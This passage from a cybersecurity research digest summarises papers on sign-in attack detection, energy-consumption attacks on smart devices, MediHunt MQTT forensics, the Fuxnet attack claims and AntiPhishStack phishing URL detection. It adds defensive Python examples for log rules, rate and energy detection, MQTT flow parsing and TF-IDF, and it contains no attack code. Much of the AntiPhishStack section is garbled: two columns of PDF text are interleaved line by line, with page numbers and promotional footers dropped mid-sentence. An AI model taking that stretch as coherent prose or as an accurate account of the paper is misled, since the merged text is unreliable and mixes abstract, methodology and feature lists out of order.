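    # T1098.005: a device registered soon after a sign-in from a hostile source.
    successes = [e for e in events
                 if e["event"] == "signin" and e["result"] == "success"]
    for e in events:
        if e["event"] == "device_register" and e["src"] in hostile_src:
            if any(s["user"] == e["user"] and s["src"] == e["src"]
                   and timedelta(0) <= e["ts"] - s["ts"] <= REG_WINDOW
                   for s in successes):
                findings.append({"ttp": "T1098.005 device registration",
                                 "subject": e["user"],
                                 "detail": f"new device from {e['src']} "
                                           f"after a credential attack"})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ttp']:30} {f['subject']:14} {f['detail']}")
```

The spraying and brute-force rules are two views of the same failure table, which is why a single source can be flagged for both; the device-registration rule deliberately fires only for sources already flagged, so that the ordinary registration of a new phone does not raise an alert on its own.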

E. Detection of Energy Consumption Cyber Attacks on Smart Devices
The paper "Detection of Energy Consumption Cyber Attacks on Smart Devices" emphasizes the rapid integration of IoT technology into smart homes, highlighting the associated security challenges due to resource constraints and unreliable networks.
• Energy Efficiency: it emphasizes the significance of energy efficiency in IoT systems, particularly in smart home environments, for comfort, convenience, and security.
• Vulnerability: it discusses the vulnerability of IoT devices to cyberattacks and physical attacks due to their resource constraints. It underscores the necessity of securing these devices to ensure their effective deployment in real-world scenarios.
• Proposed Detection Framework: The authors propose a detection framework based on analyzing the energy consumption of smart devices. This framework aims to classify the attack status of monitored devices by examining their energy consumption patterns.
• Two-Stage Approach: The methodology involves a two-stage approach. The first stage uses a short time window for rough attack detection, while the second stage involves more detailed analysis.
• Lightweight Algorithm: The paper introduces a lightweight algorithm designed to detect energy consumption attacks on smart home devices. This algorithm is tailored to the limited resources of IoT devices and considers three different protocols: TCP, UDP, and MQTT.
• Packet Reception Rate Analysis: The detection technique relies on analyzing the packet reception rate of smart devices to identify abnormal behavior indicative of energy consumption attacks.
1) Benefits
• Lightweight Detection Algorithm: The proposed algorithm is designed to be lightweight, making it suitable for resource-constrained IoT devices. This ensures that the detection mechanism does not overly burden the devices it aims to protect.
• Protocol Versatility: The algorithm considers multiple communication protocols (TCP, UDP, MQTT), enhancing its applicability across various types of smart devices and network configurations.
• Two-Stage Detection Approach: The use of a two-stage detection approach (short and long time windows) improves the accuracy of detecting energy consumption attacks while minimizing false positives. This method allows for both quick initial detection and detailed analysis.
• Real-Time Alerts: The framework promptly alerts administrators upon detecting an attack, enabling quick response and mitigation of potential threats.
• Effective Anomaly Detection: By measuring packet reception rates and analyzing energy consumption patterns, the algorithm effectively identifies deviations from normal behavior, which are indicative of cyberattacks.
2) Drawbacks
• Limited Attack Scenarios: The experimental setup tested only specific types of attacks, which limits the generalizability of the results to other potential attack vectors not covered in the study.
• Scalability Concerns: While the algorithm is designed to be lightweight, its scalability in larger, more complex smart home environments with numerous devices and varied network conditions may require further validation.
• Dependency on Baseline Data: The effectiveness of the detection mechanism relies on accurate baseline measurements of packet reception rates and energy consumption. Any changes in the normal operating conditions of the devices could affect the baseline, potentially leading to false positives or negatives.
• Resource Constraints: Despite being lightweight, the algorithm still requires computational resources, which might be a challenge for extremely resource-limited devices. Continuous monitoring and analysis could also impact the battery life and performance of these devices.
These benefits and drawbacks provide a balanced view of the proposed detection framework's capabilities and limitations, highlighting its potential for improving smart home security.
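The two-stage scheme is the core of the paper's method, and the interplay between the short and long windows is easier to see in code than in prose. The Python below is an added example written for this digest, not the paper's implementation, and it is one interpretation of the description: a baseline is learned from a clean training period, stage one flags short windows whose packet reception rate exceeds the baseline mean by k standard deviations, and stage two confirms an attack over a long window only if most of its short windows were flagged and the modelled energy exceeds the baseline by a set factor. The packet counts, window sizes, thresholds and the idle-plus-per-packet energy model are constructed assumptions. The trace ends with a single isolated burst to show stage two suppressing a stage-one false positive, and the baseline dependency listed among the drawbacks is concentrated in `learn_baseline`.

```python
import statistics
from dataclasses import dataclass


@dataclass
class Baseline:
    mean_rate: float   # packets per interval in normal operation
    std_rate: float
    idle_mj: float     # assumed idle energy per interval (constructed value)
    per_pkt_mj: float  # assumed energy to receive one packet (constructed value)


def learn_baseline(training_counts, idle_mj=5.0, per_pkt_mj=0.8):
    """Learn the baseline from a clean period; every later verdict depends on it."""
    return Baseline(statistics.fmean(training_counts),
                    statistics.pstdev(training_counts) or 1.0,
                    idle_mj, per_pkt_mj)


def interval_energy(count, b):
    """Simple energy model: idle cost plus a per-packet cost."""
    return b.idle_mj + count * b.per_pkt_mj


def stage1(counts, b, short=5, k=3.0):
    """Rough detection: flag each short window whose mean rate is > mean + k*std."""
    flags = []
    for i in range(0, len(counts) - short + 1, short):
        window = counts[i:i + short]
        flags.append(statistics.fmean(window) > b.mean_rate + k * b.std_rate)
    return flags


def stage2(counts, b, short=5, long=30, k=3.0,
           min_flag_fraction=0.6, energy_ratio=1.5):
    """Detailed analysis per long window: confirm only sustained, energy-costly deviations."""
    verdicts = []
    for start in range(0, len(counts) - long + 1, long):
        segment = counts[start:start + long]
        flags = stage1(segment, b, short, k)
        fraction = sum(flags) / len(flags)
        observed = sum(interval_energy(c, b) for c in segment)
        expected = long * interval_energy(b.mean_rate, b)
        ratio = observed / expected
        if not any(flags):
            verdict = "normal"
        elif fraction >= min_flag_fraction and ratio >= energy_ratio:
            verdict = "attack"
        else:
            verdict = "suspect"   # stage 1 fired, stage 2 did not confirm
        verdicts.append({"start": start, "flagged_short_windows": sum(flags),
                         "energy_ratio": round(ratio, 2), "verdict": verdict})
    return verdicts


def _normal(n):
    """Constructed normal traffic: 10..14 packets per interval, mean 12."""
    return [10 + (i * 7) % 5 for i in range(n)]


TRAINING = _normal(60)
_spiky = _normal(30)
_spiky[3] = 80                              # one isolated burst, not an attack
TRACE = _normal(30) + [60] * 30 + _spiky    # normal, flood, normal with a spike


if __name__ == "__main__":
    base = learn_baseline(TRAINING)
    for v in stage2(TRACE, base):
        print(v)
```

Only the "attack" verdict should page an administrator; "suspect" windows are the cheap stage-one signal that the second stage is there to filter, and the energy ratio is what separates a brief burst from a flood that actually drains the device.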

F. MediHunt
The paper "MediHunt: A Network Forensics Framework for Medical IoT Devices" addresses the need for robust network forensics in Medical Internet of Things (MIoT) environments, particularly focusing on MQTT (Message Queuing Telemetry Transport) networks. These networks are commonly used in smart hospital environments for their lightweight communication protocol. It highlights the challenges in securing MIoT devices, which are often resource-constrained and have limited computational power. The lack of publicly available flow-based MQTT-specific datasets for training attack detection systems is mentioned as a significant challenge.
The paper presents MediHunt as an automatic network forensics solution designed for real-time detection of network flow-based traffic attacks in MQTT networks. It aims to provide a comprehensive solution for data collection, analysis, attack detection, presentation, and preservation of evidence. It is designed to detect a variety of TCP/IP-layer and application-layer attacks on MQTT networks. It leverages machine learning models to enhance the detection capabilities and is suitable for deployment on resource-constrained MIoT devices.
Unlike many network forensics frameworks, MediHunt is specifically designed for the MIoT domain. This specialization allows it to address the unique challenges and requirements of medical IoT devices, such as resource constraints and the need for real-time attack detection.
1) Benefits
• Real-time Attack Detection: MediHunt is designed to detect network flow-based traffic attacks in real time, which is crucial for mitigating potential damage and ensuring the security of MIoT environments.
• Comprehensive Forensic Capabilities: The framework provides a complete solution for data collection, analysis, attack detection, presentation, and preservation of evidence. This makes it a robust tool for network forensics in MIoT environments.
• Machine Learning Integration: By leveraging machine learning models, MediHunt enhances its detection capabilities. The use of a custom dataset that includes flow data for both TCP/IP-layer and application-layer attacks allows for more accurate and effective detection of a wide range of cyber-attacks.
• High Performance: The framework has demonstrated high performance, with F1 scores and detection accuracy exceeding 0.99, which indicates that it is highly reliable in detecting attacks on MQTT networks.
• Resource Efficiency: Despite its comprehensive capabilities, MediHunt is designed to be resource-efficient, making it suitable for deployment on resource-constrained MIoT devices like the Raspberry Pi.
2) Drawbacks
• Dataset Limitations: While MediHunt uses a custom dataset for training its machine learning models, the creation and maintenance of such datasets can be challenging. The dataset needs to be regularly updated to cover new and emerging attack scenarios.
• Resource Constraints: Although MediHunt is designed to be resource-efficient, the inherent limitations of MIoT devices, such as limited computational power and memory, can still pose challenges. Ensuring that the framework runs smoothly on these devices without impacting their primary functions can be difficult.
• Complexity of Implementation: Implementing and maintaining a machine learning-based network forensics framework can be complex. It requires expertise in cybersecurity and machine learning, which may not be readily available in all healthcare settings.
• Dependence on Machine Learning Models: The effectiveness of MediHunt heavily relies on the accuracy and robustness of its machine learning models. These models need to be trained on high-quality data and regularly updated to remain effective against new types of attacks.
• Scalability Issues: While the framework is suitable for small-scale deployments on devices like the Raspberry Pi, scaling it up to larger, more complex MIoT environments may present additional challenges. Ensuring consistent performance and reliability across a larger network of devices can be difficult.
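MediHunt's detection works on flow records built from MQTT traffic, so the first practical question is how raw packets become per-flow features. The Python below is an added example written for this digest, not the MediHunt code: it decodes the MQTT fixed header (control packet type, flags and the variable-length remaining-length field) from raw packet bytes, aggregates packets into per-5-tuple flow records with per-type counters, and applies simple rules where MediHunt would apply its trained models. The packets, addresses, topics and thresholds are constructed for the example, and the helper names are my own; the packet-building helpers exist only to produce well-formed sample input offline.

```python
from collections import Counter

MQTT_TYPES = {1: "CONNECT", 2: "CONNACK", 3: "PUBLISH", 4: "PUBACK",
              8: "SUBSCRIBE", 9: "SUBACK", 12: "PINGREQ", 13: "PINGRESP",
              14: "DISCONNECT"}


def parse_fixed_header(data):
    """Decode the MQTT fixed header: (type name, flags, remaining length, header size).

    The remaining length is a variable-length integer of 1..4 bytes, 7 bits each,
    with the high bit as a continuation flag. Raises ValueError on malformed input.
    """
    if not data:
        raise ValueError("empty packet")
    ptype, flags = data[0] >> 4, data[0] & 0x0F
    value, multiplier, i = 0, 1, 1
    while True:
        if i >= len(data) or i > 4:
            raise ValueError("bad remaining length")
        byte = data[i]
        value += (byte & 0x7F) * multiplier
        multiplier *= 128
        i += 1
        if not byte & 0x80:
            break
    if len(data) - i < value:
        raise ValueError("truncated packet")
    return MQTT_TYPES.get(ptype, f"RESERVED{ptype}"), flags, value, i


def encode_remaining(n):
    """Inverse of the remaining-length decoding; used only to build sample packets."""
    out = bytearray()
    while True:
        n, digit = divmod(n, 128)
        out.append(digit | (0x80 if n else 0))
        if not n:
            return bytes(out)


def mqtt_connect(client_id):
    body = b"\x00\x04MQTT\x04\x02\x00\x3c" + len(client_id).to_bytes(2, "big") + client_id
    return b"\x10" + encode_remaining(len(body)) + body


def mqtt_publish(topic, payload):
    body = len(topic).to_bytes(2, "big") + topic + payload
    return b"\x30" + encode_remaining(len(body)) + body


def build_flows(packets):
    """Aggregate (ts, src, sport, dst, dport, payload) records into per-flow summaries."""
    flows = {}
    for ts, src, sport, dst, dport, payload in packets:
        f = flows.setdefault((src, sport, dst, dport),
                             {"first": ts, "last": ts, "packets": 0, "bytes": 0,
                              "types": Counter(), "malformed": 0})
        f["last"], f["packets"], f["bytes"] = ts, f["packets"] + 1, f["bytes"] + len(payload)
        try:
            f["types"][parse_fixed_header(payload)[0]] += 1
        except ValueError:
            f["malformed"] += 1   # keep malformed packets as a feature, not an error
    return flows


def flow_features(key, f):
    duration = max(f["last"] - f["first"], 1e-3)
    return {"src": key[0], "dst": key[2], "dport": key[3], "packets": f["packets"],
            "bytes": f["bytes"], "pps": f["packets"] / duration,
            "connect": f["types"]["CONNECT"], "publish": f["types"]["PUBLISH"],
            "malformed": f["malformed"]}


def label(feat, max_connects=5, max_pps=50, min_packets=10):
    """Rule-based stand-in for a trained classifier (thresholds are assumptions)."""
    if feat["malformed"]:
        return "malformed"
    if feat["connect"] > max_connects:
        return "connect-flood"
    if feat["packets"] >= min_packets and feat["pps"] > max_pps:
        return "publish-flood"
    return "benign"


# Constructed capture: one sensor talking to a broker, a CONNECT flood, a malformed packet.
BROKER = ("10.0.1.1", 1883)
SAMPLE_PACKETS = (
    [(0.0, "10.0.1.20", 50000, *BROKER, mqtt_connect(b"hr-sensor-03")),
     (0.05, *BROKER, "10.0.1.20", 50000, b"\x20\x02\x00\x00")]            # CONNACK
    + [(1.0 + i, "10.0.1.20", 50000, *BROKER, mqtt_publish(b"ward/3/hr", b"72"))
       for i in range(3)]
    + [(4.0, "10.0.1.20", 50000, *BROKER, mqtt_publish(b"ward/3/hr", b"x" * 300))]
    + [(10.0 + 0.01 * i, "10.0.1.99", 51000, *BROKER, mqtt_connect(b"bogus"))
       for i in range(8)]
    + [(20.0, "10.0.1.77", 52000, *BROKER, b"\x30\xff")]                   # cut-off length
)


def classify_capture(packets):
    return {key[0]: label(flow_features(key, f)) for key, f in build_flows(packets).items()}


if __name__ == "__main__":
    for src, verdict in classify_capture(SAMPLE_PACKETS).items():
        print(f"{src:12} {verdict}")
```

The feature dictionary returned by `flow_features` is the kind of row a flow-based dataset like the one the paper describes would hold; swapping `label` for a trained model is the step MediHunt adds, and the 300-byte PUBLISH is there so that the two-byte remaining-length encoding is exercised rather than assumed.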

G. Fuxnet
The Blackjack hacking group, purportedly linked to Ukrainian intelligence services, has claimed responsibility for a cyberattack that allegedly compromised emergency detection and response capabilities in Moscow and its surrounding areas. This group has been associated with previous cyberattacks targeting internet providers and military infrastructure. Their most recent claim involves an attack on Moscollector, a company responsible for constructing and monitoring underground water, sewage, and communications infrastructure.
Regarding the infection methods, the Fuxnet malware appears to have been designed to target sensor-gateways and potentially disable them, as well as to fuzz sensors, which could lead to their malfunction or destruction.
• Unverified Claims: Team82 and Claroty have not been able to confirm the claims made by the Blackjack group regarding the impact of their cyberattack on the government's emergency response capabilities or the extent of the damage caused by the Fuxnet malware.
• Discrepancy in Reported Impact: The Blackjack group initially claimed to have targeted 2,659 sensor-gateways, with about 1,700 being successfully attacked. However, Team82's analysis of the data leaked by Blackjack suggests that only a little more than 500 sensor gateways were actually impacted by the malware. The claim of having destroyed 87,000 sensors was also clarified by Blackjack, stating that they disabled the sensors by destroying the gateways and using M-Bus fuzzing, rather than physically destroying the sensors.
• M-Bus Fuzzing: The Blackjack group utilized a dedicated M-Bus fuzzer within the Fuxnet malware's code to fuzz the sensors. This technique was aimed at disabling the sensors, but the exact number of sensors that were "fried" or permanently damaged as a result of this fuzzing is unknown due to the network being taken down and access to the sensor-gateways being disabled.
• Lack of Direct Evidence: Direct evidence to confirm the extent of the damage or the impact on emergency detection and response capabilities is lacking (including for the targeted Moscollector).
• Clarification from Blackjack: Following the publication of Team82's initial analysis, the Blackjack group reached out to provide updates and clarifications, particularly challenging the contention that only around 500 sensor-gateways had been impacted. They emphasized that the JSON files made public were only a sample of the full extent of their activity.
1) Affected Industries:
• Utility Services: The primary target of the Fuxnet malware was the utility sector, specifically the sensor gateways that manage water and sewage systems. This could have implications for the delivery and monitoring of these essential services.
• Emergency Services: The group claimed to have gained access to the 112 emergency service number, which could impact the ability to respond to emergencies effectively.
• Transportation: The group also claimed to have bricked sensors and controllers in critical infrastructure, including airports and subways, which could disrupt transportation services and safety.
• Energy: Gas pipelines were mentioned as another target, indicating a potential risk to energy distribution and monitoring systems.
2) Potential Consequences:
• Disruption of Services: The destruction or malfunction of sensor gateways could lead to a disruption of the monitoring and control systems for utilities, potentially causing service outages or failures.
• Compromised Safety: In the transportation and energy sectors, the loss of sensor functionality could pose safety risks, as these sensors are often critical for detecting hazardous conditions.
• Economic Impact: The potential downtime and repair costs associated with replacing or reflashing damaged sensor gateways could have significant economic repercussions for the affected industries.
• Emergency Response Delays: If the claims about accessing the 112 emergency service number are accurate, this could lead to delays in emergency response, affecting public safety.
• Data Exfiltration: Although not explicitly mentioned in the context of Fuxnet, the malware's ability to compromise network systems could potentially lead to data breaches and the exfiltration of sensitive information.
SECTION:
UNPACKING
ANTIPHISHSTACK
learning order dependence in sequence prediction problems. It


leverages the learning of URLs and character-level TF-IDF
features symmetrically, enhancing its ability to combat
emerging phishing threats.
B. Methodology and Significance of the study
It presents a novel model for detecting phishing sites. The
significance of this study lies in its advancement of phishing
detection techniques, specifically through the introduction of a
two-phase stack generalized model named AntiPhishStack.
This model is designed to detect phishing sites without
requiring prior knowledge of phishing-specific features, which
is a significant improvement over traditional phishing detection
systems that rely on machine learning and manual features.
This research contributes to the ongoing discourse on
symmetry and asymmetry in information security and provides
a forward-thinking solution for enhancing network security in
the face of evolving cyber threats.
The data source used in the study includes two benchmark
datasets comprising benign and phishing or malicious URLs.
These datasets are used for experimental validation of the model.
Abstract – The analysis of document, titled "AntiPhishStack: LSTM- The datasets are referred to as DS1 and DS2 within the paper,
based Stacked Generalization Model for Optimized Phishing URL with DS1 including benign Yandex sites and PhishTank
Detection," will cover various aspects of the document, including its phishing sites, and DS2 consisting of benign sites from
methodology, results, and implications for cybersecurity. common-crawl, the Alexa database, and phishing sites from
Specifically, the document's approach to using Long Short-Term PhishTank.
Memory (LSTM) networks within a stacked generalization
framework for detecting phishing URLs will be examined. The C. Key components
effectiveness of the model, its optimization strategies, and its According to the methodology the proposed model operates
performance compared to existing methods will be scrutinized. in two phases (two-phase stack generalized model):
The analysis will also delve into the practical applications of the
model, discussing how it can be integrated into existing cybersecurity • Phase I: The model learns URLs and character-level
measures and its potential impact on reducing phishing attacks. The TF-IDF features symmetrically. These features are
document's relevance to cybersecurity professionals, IT specialists, trained on a base machine learning classifier, employing
and stakeholders in various industries will be highlighted, K-fold cross-validation for robust mean prediction.
emphasizing the importance of advanced phishing detection
techniques in the current digital landscape. • Phase II: A two-layered stacked-based LSTM network
This summary will serve as a valuable resource for cybersecurity with five adaptive optimizers is used for dynamic
experts, IT professionals, and others interested in the latest compilation, ensuring premier prediction on these
developments in phishing detection and prevention. features.
A. Introduction • Additionally, the symmetrical predictions from both
The paper titled "LSTM-based Stacked Generalization phases are optimized and integrated to train a meta-
Model for Optimized Phishing" discusses the escalating reliance XGBoost classifier, contributing to a final robust
on revolutionary online web services, which has introduced prediction.
heightened security risks, with persistent challenges posed by 1) URL Features
phishing attacks. • URL Structure: The paper emphasizes that attackers
Phishing, a deceptive method through social and technical often create phishing URLs that appear legitimate to
engineering, poses a severe threat to online security, aiming to users. Attackers use URL jamming tactics to deceive
obtain illicit user identities, personal account details, and bank users into disclosing personal information.
credentials. It's a primary concern within criminal activity, with
• Lightweight Features: The research aims to detect
phishers pursuing objectives such as selling stolen identities,
phishing websites using lightweight features,
extracting cash, exploiting vulnerabilities, or deriving financial
specifically a weight factor URL token system, which
gains.
allows for quick detection without accessing the
The study aims to advance phishing detection with operating website's content.
without prior phishing-specific feature knowledge. The model
leverages the capabilities of Long Short-Term Memory (LSTM) • Weight Calculation: The paper provides a formula for
networks, a type of recurrent neural network that is capable of calculating the weight Wi for i-th distinct word in a URL,

29
Read more: Boosty | Sponsr | TG

which is used to assign a weight value to each URL for • Stack Generalization for Feature Extraction: The
phishing prediction. model uses stack generalization to extract local URL
features from the character sequences, and a meta-
• URL Components: The paper describes the classifier is designed for the final prediction.
components of a URL, including the protocol, host IP
address or resource location, major domains, top-level • Advantages of the Approach: This approach allows
domains (TLD), port number, path, and optional fields the proposed model to train on URL character sequences
like inquiry. as natural features, which simplifies the learning process
and potentially improves the model's ability to detect
• Phishing Indicators: Several sub-features are identified phishing URLs without prior feature knowledge
as indicators of phishing, such as the use of an IP address
instead of a domain name, the presence of the '@' 3) Stack generalization model
symbol, the "//" symbol, domain name prefixes and • Two-Phase Approach: The model is divided into two
suffixes separated by the "-" sign, and the use of multiple phases. Phase I uses machine learning classifiers to
sub-domains. generate a mean prediction, while Phase II employs a
• HTTPS and Certificate Age: The paper notes that most two-layered LSTM-based stack generalized model
legitimate sites use HTTPS, and the age of the certificate optimized for premier prediction in phishing site
is crucial. A trustworthy certificate is required. detection.

• Favicon: The favicon can be used to redirect clients to • Integration of Predictions: The mean prediction from
dubious sites when layered from external space. Phase I is combined with the premier prediction from
Phase II. A meta-classifier, specifically XGBoost, is
• Sub-features Analysis: The paper provides an analysis then used to deliver the final prediction.
of sub-features like the IP address, '@' symbol, "//"
symbol, domain name prefixes and suffixes, HTTPS, • Stack Generalization Technique: The model uses
and favicon, explaining how these features can be used stack generalization, an ensemble learning
to identify phishing websites methodology that integrates various machine learning
algorithms and deep learning models, to enhance
2) Character Level Features detection impact.
• TF-IDF for Character-Level Features: The paper utilizes Term Frequency-Inverse Document Frequency (TF-IDF) at the character level to determine the relative importance of characters within URLs across the corpus of URLs being analyzed.

• TF-IDF Calculation: The TF-IDF score is composed of two parts: Term Frequency (TF), which is the normalized count of a term within a document, and Inverse Document Frequency (IDF), which is the logarithm of the ratio of the total number of documents to the number of documents containing the term.

• Levels of TF-IDF: The paper mentions that TF-IDF vectors can be generated at different levels, such as word level, character level, and n-gram level, with the character level being particularly relevant for this study.

• Limitations of TF-IDF: The paper acknowledges that while TF-IDF is useful for extracting prominent keywords, it has limitations, such as failing to extract misspelled terms, which can be problematic since URLs may contain nonsensical words.

• Character-Level TF-IDF: To address the limitations of TF-IDF for URLs that may contain misspelled or nonsensical words, the study employs a character-level TF-IDF approach with a maximum feature count of 5000.

• Natural Feature Learning: The model treats URL strings as character sequences, which are considered natural features that do not require prior feature knowledge for the model to learn effectively.

• Model Flow: The model's flow includes collecting datasets, dividing them into training and testing sets, constructing the stack generalization model's phases, and merging predictions for the ultimate prediction.

• Feature Importance: The model emphasizes the importance of URL and character-level TF-IDF features, which are learned symmetrically to detect phishing web pages.

• Significant Advantages: The model offers several advantages, including independence from prior feature knowledge, strong generalization ability, and independence from cybersecurity experts and third-party services.

• Enhanced Phishing Detection: The model aims to intelligently identify new phishing URLs previously unidentified as fraudulent, demonstrating robust performance on benchmark datasets.

4) Experiments
This section presents the experimental validation of the proposed model. The model was tested on two benchmark datasets, which comprised benign and phishing or malicious URLs.

• The model demonstrated exceptional performance in detecting phishing sites, achieving an accuracy of 96.04%. This result was notably higher compared to existing studies.

• The model was assessed through various metrics, including AUC-ROC curve, Precision, Recall, F1,
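To make the TF-IDF bullets above concrete, here is an added example, written for this digest entry and not code from the paper, that implements character-level TF-IDF from scratch with the two parts the text names (a length-normalised term frequency and log(N/df)) plus a most-frequent-terms cap that plays the role of the paper's 5000-feature limit. The URLs are constructed samples, and the `ngram` parameter generalises the same code to the character n-gram level the text also mentions.

```python
import math
from collections import Counter

# Constructed sample corpus for the example (not the paper's datasets):
# three benign-looking URLs and two lookalike phishing-style URLs.
SAMPLE_URLS = [
    "https://www.example.com/login",
    "https://mail.example.com/inbox",
    "https://docs.example.com/help/reset",
    "http://examp1e-login.verify-account.xyz/secure",
    "http://paypa1.com.account-update.info/signin",
]


def char_terms(url, ngram=1):
    """Split a URL into character-level terms. ngram=1 is the paper's
    character level; ngram>1 gives the character n-gram level it also names."""
    url = url.lower()
    return [url[i:i + ngram] for i in range(len(url) - ngram + 1)]


def term_frequency(terms):
    """TF: count of each term normalised by the number of terms in the document."""
    if not terms:
        return {}
    counts = Counter(terms)
    return {t: c / len(terms) for t, c in counts.items()}


def inverse_document_frequency(docs_terms):
    """IDF: log(N / df), N = number of documents, df = documents containing the term."""
    df = Counter()
    for terms in docs_terms:
        df.update(set(terms))
    n_docs = len(docs_terms)
    return {t: math.log(n_docs / d) for t, d in df.items()}


def build_vocabulary(docs_terms, max_features):
    """Keep the max_features most frequent terms in the corpus (the role the
    paper's 5000-feature cap plays); ties broken by term for determinism."""
    corpus = Counter()
    for terms in docs_terms:
        corpus.update(terms)
    ranked = sorted(corpus.items(), key=lambda kv: (-kv[1], kv[0]))
    return [t for t, _ in ranked[:max_features]]


def tfidf_vectors(urls, max_features=5000, ngram=1):
    """Return (vocabulary, one TF-IDF vector per URL) aligned on the vocabulary."""
    docs_terms = [char_terms(u, ngram) for u in urls]
    vocab = build_vocabulary(docs_terms, max_features)
    idf = inverse_document_frequency(docs_terms)
    vectors = []
    for terms in docs_terms:
        tf = term_frequency(terms)
        vectors.append([tf.get(t, 0.0) * idf[t] for t in vocab])
    return vocab, vectors


def top_terms(vocab, vector, k=5):
    """The k highest-weighted terms of one vector: what distinguishes this URL."""
    ranked = sorted(zip(vocab, vector), key=lambda tv: (-tv[1], tv[0]))
    return [t for t, w in ranked[:k] if w > 0]


if __name__ == "__main__":
    vocab, vecs = tfidf_vectors(SAMPLE_URLS)
    for url, vec in zip(SAMPLE_URLS, vecs):
        print(f"{url:48s} top chars: {top_terms(vocab, vec)}")
```

Characters present in every URL (the scheme, "/", ".") get an IDF of zero and drop out of every vector, while characters that occur only in the lookalike URLs, the substituted digit among them, carry the weight. That is the property the paper relies on: no word-level vocabulary is needed, so misspelled or nonsensical tokens still produce usable features.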

30
Read more: Boosty | Sponsr | TG

mean absolute error (MAE), mean square error (MSE), and accuracy.

• A comparative analysis with baseline models and traditional machine learning algorithms, such as support vector machine, decision tree, naïve Bayes, logistic regression, K-nearest neighbor, and sequential minimal optimization, highlighted the superior phishing detection efficiency of the model.

• The model was found to be effective in identifying new phishing URLs that were previously unidentified as fraudulent.

• The model operates without prior phishing-specific feature knowledge, which is a significant advantage in achieving advancements in cybersecurity.

5) Optimizer evaluation on LSTM
• Optimizer Performance: The paper evaluates the performance of five different adaptive optimizers: AdaDelta, Adam, RMSprop, AdaGrad, and SGD (Stochastic Gradient Descent), to determine which is best suited for the proposed anti-phishing model.

• Epochs and Learning Rate: Different numbers of epochs are considered to implement the 2-layered LSTM with different optimizers. The learning rate, a crucial hyperparameter, is adjusted for each optimizer to control the speed at which the model learns.

• Accuracy, MSE, and MAE: The paper reports the accuracy, mean squared error (MSE), and mean absolute error (MAE) for each optimizer with the LSTM-based stack generalization model on two datasets (DS1 and DS2).

• Results on Datasets: The AdaGrad optimizer provided the highest accuracy with the lowest MSE and MAE on DS1, while the Adam optimizer achieved the highest accuracy on DS2.

• Precision-Recall Curves: Precision-recall curves are presented for each feature set, indicating the trade-off between precision and recall for the different optimizers.

• Optimizer Selection: The analysis suggests that the learning rate significantly contributes to the success of the proposed model with the adaptive optimizers. The Adam optimizer is highlighted for its performance with a specific learning rate when the 2-layered LSTM is employed with 100 epochs.

• Comparative Analysis: The average performance of the optimizers on DS1 and DS2 is compared, with DS2 showing slightly better accuracy.

• Significance of Optimizers: The evaluation of optimizers is crucial for the model's accuracy; the optimizer is a key component of machine learning and artificial intelligence, responsible for molding the model to acquire the most accurate results possible.

D. Key findings
The model's design allows it to effectively identify new phishing URLs previously unidentified as fraudulent, thus reducing the likelihood of false negatives. The use of K-fold cross-validation and a two-layered LSTM network helps to mitigate overfitting and improve the model's ability to correctly classify phishing sites, thereby reducing the likelihood of false positives.

• Development of model: a novel model introduced via a two-phase stack generalized model designed to detect phishing sites effectively.

• Learning of URLs and character-level TF-IDF features symmetrically: This model leverages the learning of URLs and character-level TF-IDF features symmetrically. This enhances the model's ability to combat emerging phishing threats.

• Two-phase operation: In Phase I, features are trained on a base machine learning classifier, employing K-fold cross-validation for robust mean prediction. Phase II employs a two-layered stacked-based LSTM network with five adaptive optimizers for dynamic compilation, ensuring premier prediction on these features.

• Integration of predictions (Meta-XGBoost Classifier): The symmetrical predictions from both phases are optimized and integrated to train a meta-XGBoost classifier, contributing to a final robust prediction.

• Independence from prior phishing-specific feature knowledge: The model operates without prior phishing-specific feature knowledge, which is a significant advancement in phishing detection, showing strong generalization ability and independence from cybersecurity experts and third-party services.

• High performance: Experimental validation on two benchmark datasets, comprising benign and phishing or malicious URLs, demonstrates the model's exceptional performance, achieving a notable 96.04% accuracy compared to existing studies.

• Independence from cybersecurity experts and third-party services: This model autonomously extracts necessary URL features, eliminating the reliance on cybersecurity experts. It also demonstrates independence from third-party features such as page rank or domain age.

• Strong generalization ability: The URL character-based features are utilized for more robust generalization and check-side accuracy, and the multi-level or low-level features are combined in the hidden layers of the neural network to attain effective generalization.

• Prior feature knowledge independence: The approach taken in this work treats URL strings as

character sequences, serving as natural features that require no prior feature knowledge for the proposed model to learn effectively.

• Enhancing Network Security: The research adds value to the ongoing discourse on symmetry and asymmetry in information security and provides a forward-thinking solution for enhancing network security in the face of evolving cyber threats.

E. Benefits and limitations of the study
Comparatively, traditional phishing systems, reliant on machine learning and manual features, struggle with evolving tactics. Other models, such as the CNN-LSTM model and the end-to-end deep learning architecture grounded in natural language processing techniques, have shown limitations in their generalization on test data and their dependency on existing knowledge of phishing detection. The model, in contrast, shows strong generalization ability and independence from prior feature knowledge, making it a robust and effective tool for phishing detection.

The benefits of the study compared to traditional phishing systems include:

• Prior Feature Knowledge Independence: The proposed model does not require prior phishing-specific feature knowledge, which allows it to adapt to new and evolving phishing tactics more effectively than traditional systems that rely on predefined features.

• Strong Generalization Ability: The model uses URL character-based features for robust generalization and check-side accuracy, which enables it to generalize across different phishing threats better than traditional systems that may not adapt as well to variations in phishing URLs.

• Independence from Cybersecurity Experts and Third-Party Services: The model autonomously extracts necessary URL features, reducing the reliance on cybersecurity experts and third-party services like page rank or domain age, which traditional systems may depend on.

• High Accuracy: The model has demonstrated exceptional performance, achieving a notable 96.04% accuracy on benchmark datasets, which is a significant improvement over traditional phishing detection systems.

• Adaptability to Evolving Threats: The model's design allows it to learn from the data it processes, making it potentially more adaptable to the continuously evolving tactics used by phishers, unlike traditional systems that may require manual updates to stay effective.

Limitations of the study include:

• Real-World Application: The paper does not discuss the model's performance in real-world scenarios where phishing tactics are constantly evolving.

• Performance on Other Datasets: The model's performance has been validated on two benchmark datasets, but it's unclear how it would perform on other datasets or in different contexts.

• Feature Reliance: The model's reliance on URL and character-level TF-IDF features may limit its ability to detect phishing attempts that use other tactics.

• Computational Resources: The paper does not discuss the computational resources required to implement the model, which could be a potential limitation for some users.

The proposed model has several limitations in terms of scalability and performance.

• Firstly, the model's reliance on Long Short-Term Memory (LSTM) networks can lead to computational inefficiency. LSTM networks are known for their high computational and memory requirements, which can limit the model's scalability when dealing with large datasets or in real-time applications.

• Secondly, the model's two-phase approach, which involves training features on a base machine learning classifier and then employing a two-layered stacked-based LSTM network, can be time-consuming and computationally intensive. This could potentially limit the model's performance in real-time phishing detection scenarios.

